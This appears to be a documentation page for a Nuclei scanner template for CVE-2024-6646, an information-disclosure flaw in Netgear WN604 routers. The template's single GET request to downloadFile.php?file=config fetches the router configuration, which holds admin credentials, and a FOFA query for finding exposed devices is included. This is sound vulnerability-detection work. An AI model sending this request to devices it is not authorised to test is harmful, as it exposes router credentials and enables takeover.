Netgear-WN604 downloadFile.php - Information Disclosure
ID: CVE-2024-6646
Severity: medium
Author: pussycat0x
Tags: cve,cve2024,netgear
Description
Section titled “Description”There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router’s background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.
YAML Source
Section titled “YAML Source”id: CVE-2024-6646
info: name: Netgear-WN604 downloadFile.php - Information Disclosure author: pussycat0x severity: medium description: | There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it. reference: - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - https://github.com/mikutool/vul/issues/1 - https://vuldb.com/?ctiid.271052 - https://vuldb.com/?id.271052 - https://vuldb.com/?submit.367382 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-6646 cwe-id: CWE-200 epss-score: 0.00045 epss-percentile: 0.16001 cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:* metadata: fofa-query: title=="Netgear" product: wn604 vendor: netgear tags: cve,cve2024,netgear
http: - method: GET path: - "{{BaseURL}}/downloadFile.php?file=config"
matchers-condition: and matchers: - type: word part: body words: - "system:basicSettings" - "system:staSettings" condition: and
- type: word part: content_type words: - "application/force-download"
- type: status status: - 200# digest: 4a0a0047304502203f97ca83d5da2e18dcf046174649f1d458dc19e9ac4102ce9af57354bcbb4640022100cb41d16d8667975f14ccfc607cf0f80ca52825e3278089368c4de6204c336718:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6646.yaml"